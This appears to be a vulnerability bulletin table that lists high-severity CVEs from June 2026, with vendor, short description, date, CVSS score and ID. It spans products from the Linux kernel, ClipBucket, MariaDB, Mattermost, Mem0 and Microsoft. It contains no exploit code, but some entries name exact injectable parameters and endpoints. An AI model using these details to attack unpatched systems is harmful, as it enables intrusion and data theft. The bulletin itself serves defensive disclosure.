| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rockchip: rkcif: fix off by one bugs Change these comparisons from > vs >= to avoid accessing one element beyond the end of the arrays. While at it, use ARRAY_SIZE instead of the _MAX enum values. [fix cosmetic issues] | 2026-06-09 | 7.8 | CVE-2026-52907 |
| LiteSpeed Technologies--cPanel Plugin | LiteSpeed cPanel plugin before 2.4.8 (as distributed in LiteSpeed WHM PlugIn before 5.3.2.0) mishandles symlinks provided by a user with FTP or web shell access on a shared hosting server running CloudLinux/CageFS, as exploited in the wild in May 2026. | 2026-06-14 | 8.5 | CVE-2026-54420 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #140, ClipBucket's Remote Play feature allows any authenticated user to add a video by importing an external URL as the source. Some shell commands are run with the URL as a parameter. The URL is concatenated directly into shell commands without escaping then executed, so any shell metacharacter in the URL is interpreted. This results in arbitrary command execution. This issue has been patched in version 5.5.3 - #140. | 2026-06-11 | 9.8 | CVE-2026-42846 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #129, the actions/progress_video.php endpoint is vulnerable to blind SQL injection. Any unauthenticated user can exploit the ids parameter to execute SQL queries and exfiltrate sensitive data. This issue has been patched in version 5.5.3 - #129. | 2026-06-11 | 9.8 | CVE-2026-45060 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #132, any authenticated user who can upload videos can add multiple subtitles from different files and change their title (English, Spanish...). The POST /actions/subtitle_edit.php request used to change their title includes a number parameter which is vulnerable to SQL Injection. A boolean-based blind SQL injection can be used to exfiltrate sensitive data. This issue has been patched in version 5.5.3 - #132. | 2026-06-11 | 8.8 | CVE-2026-45418 |
| makeplane--plane | Plane is an open-source project management tool. Prior to version 1.3.1, a cross-workspace asset authorization bypass lets any authenticated user read, copy, delete, and overwrite assets in other Plane workspaces. This issue has been patched in version 1.3.1. | 2026-06-10 | 8.3 | CVE-2026-46558 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. Versions 10.6.1 through 10.6.26, 10.11.1 through 10.11.17, 11.4.1 through 11.4.11, 11.8.1 through 11.8.7, and 12.3.1 with `wsrep_notify_cmd` enabled would execute shell commands embedded in the name of the joiner node. This is fixed in 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2. As a workaround, anyone who cannot upgrade now should disable `wsrep_notify_cmd`. | 2026-06-11 | 10 | CVE-2026-49261 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, during the SST the donor node is interpolating parameters that the joiner sent into the command line. Not all parameters were properly validated which could allow a malicious joiner to execute arbitrary shell commands on the donor side via the mariabackup SST method. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | 8 | CVE-2026-44168 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1, during the SST the donor node is interpolating parameters that the joiner sent into the command line. Not all parameters were properly validated which could allow a malicious joiner to execute arbitrary shell commands on the donor side via the rsync SST method. This issue has been patched in versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2. | 2026-06-12 | 8 | CVE-2026-48163 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.27, 10.11.1 to before 10.11.18, 11.4.1 to before 11.4.12, 11.8.1 to before 11.8.8, and 12.3.1, a high-privileged MariaDB user could've used wsrep_sst_receive_address or wsrep_sst_donor global system variables to execute shell commands as the uid of the mariadbd process on the galera joiner node. This issue has been patched in versions 10.6.27, 10.11.18, 11.4.12, 11.8.8, and 12.3.2. | 2026-06-12 | 8 | CVE-2026-48165 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 Mattermost fails to require role-management authorization when setting the scheme_admin flag on group syncable link and patch endpoints, which allows a user with group-link permissions to escalate themselves and group members to team or channel admin via crafted API requests. Mattermost Advisory ID: MMSA-2026-00665 | 2026-06-12 | 8.8 | CVE-2026-7387 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 Mattermost fails to sanitize FileInfo.Name received from federated peers during shared channel file sync, which allows an attacker who controls a federated server to write files to arbitrary locations within the target server's filestore via path traversal sequences in the filename field. Mattermost Advisory ID: MMSA-2026-00661 | 2026-06-12 | 7.6 | CVE-2026-6961 |
| Md. Shamim Shahnewaz--Single Personal Message | Single Personal Message 1.0.3 contains an SQL injection vulnerability that allows authenticated users to execute arbitrary SQL queries by injecting malicious code through the message parameter. Attackers can access the admin interface and supply crafted SQL statements in the message parameter to extract sensitive database information including user credentials and site configuration data. | 2026-06-09 | 7.1 | CVE-2016-20063 |
| mem0ai--mem0 | Mem0 versions through 0.2.8, fixed in commit ae7f406, contain a missing authorization vulnerability in the self-hosted server component where the POST /configure endpoint modifies global LLM provider and embedder configuration but only verifies authentication via JWT or X-API-Key without validating the caller's role. Any authenticated user holding a distributed API key can redirect all LLM and embedder traffic to an attacker-controlled server, with the malicious configuration persisted to PostgreSQL and surviving server restarts to affect all users and API keys on the instance. | 2026-06-09 | 8.1 | CVE-2026-49948 |
| Microsoft--.NET 10.0 | Improper authorization in .NET allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45490 |
| Microsoft--.NET 10.0 | Uncontrolled resource consumption in ASP.NET Core allows an unauthorized attacker to deny service over a network. | 2026-06-09 | 7.5 | CVE-2026-45591 |
| Microsoft--Azure Kubernetes Service | Improper limitation of a pathname to a restricted directory ('path traversal') in Microsoft Azure Kubernetes Service allows an authorized attacker to execute code locally. | 2026-06-09 | 8.8 | CVE-2026-32193 |
| Microsoft--Azure Stack Edge | External control of file name or path in Azure Stack Edge allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-47643 |
| Microsoft--Azure Stack Edge | Improper neutralization of input during web page generation ('cross-site scripting') in Azure Stack Edge allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 8.4 | CVE-2026-41098 |
| Microsoft--Linux kernel - Microsoft MANA Network Driver | Use after free in Linux MANA Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 8.2 | CVE-2026-45476 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 8.2 | CVE-2026-44822 |
| Microsoft--Microsoft 365 Apps for Enterprise | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45456 |
| Microsoft--Microsoft 365 Apps for Enterprise | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45458 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45461 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45463 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45472 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45474 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44817 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7 | CVE-2026-44818 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44819 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44820 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44823 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44824 |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45457 |
| Microsoft--Microsoft 365 Apps for Enterprise | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45469 |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45471 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45475 |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45486 |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45643 |
| Microsoft--Microsoft 365 Apps for Enterprise | Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45645 |
| Microsoft--Microsoft 365 Apps for Enterprise | Use after free in Microsoft Office Click-To-Run allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-47293 |
| Microsoft--Microsoft Dynamics 365 (on-premises) version 9.1 | Improper handling of insufficient permissions or privileges in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to elevate privileges over a network. | 2026-06-09 | 8.8 | CVE-2026-40371 |
| Microsoft--Microsoft Excel for Android | Integer overflow or wraparound in Windows Win32K - GRFX allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44803 |
| Microsoft--Microsoft Excel for Android | Integer overflow or wraparound in Windows Win32K - GRFX allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-44812 |
| Microsoft--Microsoft Excel for Android | Improper access control in Office for Android allows an unauthorized attacker to perform spoofing locally. | 2026-06-09 | 7.1 | CVE-2026-45649 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to disclose information over a network. | 2026-06-09 | 8.1 | CVE-2026-45503 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network. | 2026-06-09 | 8.8 | CVE-2026-45504 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 8.1 | CVE-2026-47631 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Improper control of generation of code ('code injection') in Microsoft Exchange Server allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-45583 |
| Microsoft--Microsoft Live Share Canvas SDK | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Live Share Canvas SDK allows an authorized attacker to elevate privileges over a network. | 2026-06-09 | 8 | CVE-2026-45644 |
| Microsoft--Microsoft Office LTSC 2024 | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-47635 |
| Microsoft--Microsoft PC Manager | Improper access control in Microsoft PC Manager allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.8 | CVE-2026-49161 |
| Microsoft--Microsoft PC Manager | Improper link resolution before file access ('link following') in Microsoft PC Manager allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-50511 |
| Microsoft--Microsoft PC Manager | Improper link resolution before file access ('link following') in Microsoft PC Manager allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-50512 |
| Microsoft--Microsoft PowerToys | Improper authorization in Microsoft PowerToys allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42902 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network. | 2026-06-09 | 8.8 | CVE-2026-45484 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-06-09 | 8 | CVE-2026-47298 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 7.3 | CVE-2026-45481 |
| Microsoft--Microsoft SharePoint Server 2019 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 7.3 | CVE-2026-47634 |
| Microsoft--Microsoft Teams for Android | Improper neutralization of special elements in output used by a downstream component ('injection') in Microsoft Teams for Android allows an authorized attacker to disclose information over a network. | 2026-06-09 | 8.1 | CVE-2026-42835 |
| Microsoft--Microsoft Visual Studio Code CoPilot Chat Extension | Improper limitation of a pathname to a restricted directory ('path traversal') in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to bypass a security feature locally. | 2026-06-09 | 8.4 | CVE-2026-45482 |
| Microsoft--Nuance PowerScribe 360 4.0 | Deserialization of untrusted data in Nuance PowerScribe allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-26142 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.8 | CVE-2026-42985 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-42909 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-42913 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-44799 |
| Microsoft--Remote Desktop client for Windows Desktop | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-44801 |
| Microsoft--Remote Desktop client for Windows Desktop | Out-of-bounds read in Windows RDP allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 7.5 | CVE-2026-45639 |
| Microsoft--Visual Studio Code | Improper input validation in Visual Studio Code allows an unauthorized attacker to elevate privileges over a network. | 2026-06-09 | 9.6 | CVE-2026-47281 |
| Microsoft--Visual Studio Code | Improper input validation in Visual Studio Code allows an unauthorized attacker to elevate privileges over a network. | 2026-06-09 | 7.5 | CVE-2026-40376 |
| Microsoft--Visual Studio Code | Improper input validation in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally. | 2026-06-09 | 7.1 | CVE-2026-48569 |
| Microsoft--Visual Studio Code - MSSQL Extension | Inclusion of functionality from untrusted control sphere in Visual Studio Code allows an unauthorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-47292 |
| Microsoft--Windows 10 Version 1607 | Stack-based buffer overflow in Windows DHCP Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-44815 |
| Microsoft--Windows 10 Version 1607 | A vulnerability in Windows DHCP Server (no CWE assigned in the source entry) allows an unauthorized attacker to perform tampering over a network. | 2026-06-09 | 9.1 | CVE-2026-45602 |
| Microsoft--Windows 10 Version 1607 | Integer overflow or wraparound in Windows HTTP.sys allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-47291 |
| Microsoft--Windows 10 Version 1607 | Use after free in Universal Plug and Play (upnp.dll) allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-45599 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45607 |
| Microsoft--Windows 10 Version 1607 | Use after free in Universal Plug and Play (upnp.dll) allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-45635 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.8 | CVE-2026-47289 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.8 | CVE-2026-47653 |
| Microsoft--Windows 10 Version 1607 | Trust boundary violation in Windows Attestation allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-33828 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-34335 |
| Microsoft--Windows 10 Version 1607 | Windows Universal Disk Format File System Driver (UDFS) Elevation of Privilege Vulnerability | 2026-06-09 | 7.8 | CVE-2026-40404 |
| Microsoft--Windows 10 Version 1607 | Windows Universal Disk Format File System Driver (UDFS) Elevation of Privilege Vulnerability | 2026-06-09 | 7.8 | CVE-2026-40409 |
| Microsoft--Windows 10 Version 1607 | Improper access control in Microsoft Kinect allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-41092 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Microsoft Windows DNS allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-41108 |
| Microsoft--Windows 10 Version 1607 | Concurrent execution using shared resource with improper synchronization ('race condition') in Function Discovery Service (fdwsd.dll) allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-42836 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42905 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows RDP allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 7.5 | CVE-2026-42908 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-42911 |
| Microsoft--Windows 10 Version 1607 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Telephony Service allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-42912 |
| Microsoft--Windows 10 Version 1607 | Integer underflow (wrap or wraparound) in Windows NT OS Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42916 |
| Microsoft--Windows 10 Version 1607 | Integer underflow (wrap or wraparound) in Windows NT OS Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42980 |
| Microsoft--Windows 10 Version 1607 | Use after free in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42986 |
| Microsoft--Windows 10 Version 1607 | Improper link resolution before file access ('link following') in Winlogon allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42989 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-42992 |
| Microsoft--Windows 10 Version 1607 | Improper link resolution before file access ('link following') in Windows Collaborative Translation Framework allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45586 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-45588 |
| Microsoft--Windows 10 Version 1607 | Integer overflow or wraparound in Windows Internet (wininet.dll) allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45592 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45596 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45598 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45601 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45603 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45605 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-45636 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45638 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45653 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows UEFI allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.8 | CVE-2026-45656 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack. | 2026-06-09 | 7.8 | CVE-2026-45658 |
| Microsoft--Windows 10 Version 1607 | Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-47648 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Boot Manager allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-47656 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48568 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48570 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48573 |
| Microsoft--Windows 10 Version 1607 | Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code locally. | 2026-06-09 | 7.8 | CVE-2026-48574 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48575 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48576 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Secure Boot allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.9 | CVE-2026-48578 |
| Microsoft--Windows 10 Version 1607 | Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-48583 |
| Microsoft--Windows 10 Version 1607 | Uncontrolled resource consumption in HTTP/2 allows an unauthorized attacker to deny service over a network. | 2026-06-09 | 7.5 | CVE-2026-49160 |
| Microsoft--Windows 10 Version 1809 | Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42828 |
| Microsoft--Windows 10 Version 1809 | Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42837 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42977 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42978 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42979 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42983 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-42984 |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Push Notifications allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42991 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44802 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows SDK allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45593 |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45637 |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-48563 |
| Microsoft--Windows 10 Version 21H2 | Heap-based buffer overflow in Windows TCP/IP allows an unauthorized attacker to elevate privileges over an adjacent network. | 2026-06-09 | 9.6 | CVE-2026-42904 |
| Microsoft--Windows 10 Version 21H2 | Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.4 | CVE-2026-45641 |
| Microsoft--Windows 10 Version 21H2 | Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 7.5 | CVE-2026-42993 |
| Microsoft--Windows 10 Version 21H2 | Time-of-check time-of-use (TOCTOU) race condition in Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45487 |
| Microsoft--Windows 10 Version 21H2 | Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45640 |
| Microsoft--Windows 11 version 23H2 | Use after free in Windows Kernel allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 9.8 | CVE-2026-45657 |
| Microsoft--Windows 11 version 23H2 | Integer underflow (wrap or wraparound) in Windows Performance Monitor allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-42974 |
| Microsoft--Windows 11 version 23H2 | Integer underflow (wrap or wraparound) in Windows Performance Monitor allows an unauthorized attacker to execute code over a network. | 2026-06-09 | 8.1 | CVE-2026-42981 |
| Microsoft--Windows 11 version 23H2 | Improper authentication in Windows Cryptographic Services allows an unauthorized attacker to elevate privileges locally. | 2026-06-09 | 8.4 | CVE-2026-44810 |
| Microsoft--Windows 11 version 23H2 | Out-of-bounds read in Windows Hyper-V allows an unauthorized attacker to execute code locally. | 2026-06-09 | 8.2 | CVE-2026-47652 |
| Microsoft--Windows 11 version 23H2 | Concurrent execution using shared resource with improper synchronization ('race condition') in UI Automation Manager (uiamanager.dll) allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7 | CVE-2026-45597 |
| Microsoft--Windows 11 Version 24H2 | Improper access control in Windows Administrator Protection allows an authorized attacker to bypass a security feature locally. | 2026-06-09 | 7.8 | CVE-2026-42829 |
| Microsoft--Windows 11 Version 24H2 | Out-of-bounds write in Windows Hotpatch Monitoring Service allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-42910 |
| Microsoft--Windows 11 Version 24H2 | Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-44809 |
| Microsoft--Windows 11 Version 24H2 | Access of resource using incompatible type ('type confusion') in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 7.8 | CVE-2026-45600 |
